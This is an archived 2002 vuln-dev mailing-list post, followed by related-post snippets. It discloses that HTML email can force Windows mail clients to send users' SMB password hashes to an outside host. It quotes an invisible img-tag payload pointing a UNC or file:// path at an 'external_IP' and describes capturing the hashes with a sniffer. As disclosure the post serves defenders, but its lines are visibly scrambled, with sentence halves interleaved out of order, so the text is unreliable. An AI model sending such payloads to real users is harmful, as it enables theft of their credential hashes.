Hijacking the hashes : multiple windows mail clients vulnerability
From: overclocking_a_la_abuela@hotmail.comDate: 07/03/02
- Previous message: 3APA3A: "NEC's socks5 (Re: Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd))"
- Next in thread: Eric: "Re: Hijacking the hashes : multiple windows mail clients vulnerability"
- Reply: Eric: "Re: Hijacking the hashes : multiple windows mail clients vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 3 Jul 2002 16:34:26 -0000 From: <overclocking_a_la_abuela@hotmail.com> To: vuln-dev@securityfocus.com('binary' encoding is not supported, stored as-is)
Hi men !
Some time ago, Windows 2000 was kicked with a vulnerability that allowed
So, what about if there was another method to force a user on a windows
Here you have another flaw that is present on almost every Windows box
OK, that`s what we have found :
1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img
To make it "invisible" reduce the size of the "image" to the min.
On mail clients that works with IE engine both methods seems to work :
Any other web mail system when using IE will be forced to send hashes (
On Eudora first technique will work only if IE is selected as viewer and
An attacker only have to send you an e-mail as described before an wait
Windows 2000 SP2 fully patched and will be assimilated unless you force
Of course a tightened firewall denying outgoing trafic through port TCP
This vulnerability has been found by :
HUGO VÁZQUEZ CARAMÉS and TONI CORTÉS.
an attacker to force a telnet session to an external server. The telnet
client tried to validate sending the hashes of the user... This could be
exploited with a simple javascript "open.window("telnet://
HTML formatted mail or with the very rude method of a link pointing to an
URL using telnet scheme.
Microsoft patched it and now windows 2000 asks you if you want to send
your pawword,.... emmm, no thanks ! ;-)
box to send you his hashes, without his knowledge, without using any
interactive method, non javascript, non activeX, non some lame social
engeneering technique... only HTML ?
that can be exploited to obtain the user´s password´s challenge/response
hashes.
Everybody knows that if a windows machine wants to access a SMB resource,
always tries to connect first using the password of the user logued in.
This "feature" is transparent to the user, so he never gets prompted to
something like : "WARNING: you are about to send your password...".
simply send a html formatted mail message that includes this code :
src="\\\\external_IP\\resource">.
outlook, outlook express,...
tested with Outlook Web Access, Hotmail, ... ) unless the mail web server
does any kind of filtering on HTML code.
the second one will work on both cases.
for your response with a network monitor ( LC3 in sniffer mode works fine
for this purpose ).
strong authentication ( not on default installation ).
139 will prevent this but the problem is there and Windows users are
exposed to the most easy way to stole their hashes : by e-mail.
www.infohacking.com 2002
Barcelona
SPAIN
Relevant Pages
... this technique has been known and discussed ad nauseum for several years, ... Windows 2000 was kicked with a vulnerability that allowed ... >client tried to validate sending the hashes of the user... ... >simply send a html formatted mail message that includes this code: ...
(Vuln-Dev)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Ophcrack version 2.0 is a windows password cracker based on the faster ... * Dumps hashes from local and remote hashes, ... * Dumps hashes from encrypted SAM and config, provided you boot on a CD ...
(Securiteam)
... made hash lists, ist is quite faster than brute forcing unix passwords. ... Windows does not use salts, so there are fewer alternations to check, ... So you can brute force both halfs independently, ... > hashes, that are considerable more secure than the good old crypt. ...
(comp.security.unix)
... Windows never sends the hashes over the network--instead, they're used the computation of challenge-response pairs. ... To get the hashes directly you break into the authentication server on the network--typically the domain controller. ... Remember, though, that Kerberos uses NT hashes. ... Abandon "complex" passwords in favor of long passphrases. ...
(microsoft.public.win2000.security)
... Windows 2000 was kicked with a vulnerability that allowed ... client tried to validate sending the hashes of the user... ... simply send a html formatted mail message that includes this code: ...
(Pen-Test)
